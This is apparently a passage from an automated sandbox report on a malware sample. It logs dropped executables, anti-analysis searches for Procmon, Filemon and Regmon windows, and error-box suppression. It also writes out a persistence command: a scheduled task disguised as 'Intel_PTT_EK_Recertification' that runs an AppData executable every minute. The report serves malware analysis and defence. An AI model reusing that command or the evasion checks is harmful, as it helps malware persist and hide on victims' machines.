                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\in.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeFile created: C:\Users\user\AppData\Local\Temp\main\7z.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeJump to dropped file

                            Boot Survival

                            barindex
                            Source: C:\Users\user\Desktop\random.exe_Y.exeWindow searched: window name: FilemonClassJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeWindow searched: window name: RegmonClassJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeWindow searched: window name: FilemonClassJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonclassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1016876001\d7691cd336.exeWindow searched: window name: FilemonClass
                            Source: C:\Users\user\AppData\Local\Temp\1016876001\d7691cd336.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                            Source: C:\Users\user\AppData\Local\Temp\1016876001\d7691cd336.exeWindow searched: window name: RegmonClass
                            Source: C:\Users\user\AppData\Local\Temp\1016876001\d7691cd336.exeWindow searched: window name: FilemonClass
                            Source: C:\Users\user\AppData\Local\Temp\1016876001\d7691cd336.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeWindow searched: window name: FilemonClass
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeWindow searched: window name: RegmonClass
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeWindow searched: window name: FilemonClass
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeWindow searched: window name: Regmonclass
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeWindow searched: window name: Filemonclass
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                            Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                            Source: C:\Users\user\Desktop\random.exe_Y.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\1016876001\d7691cd336.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
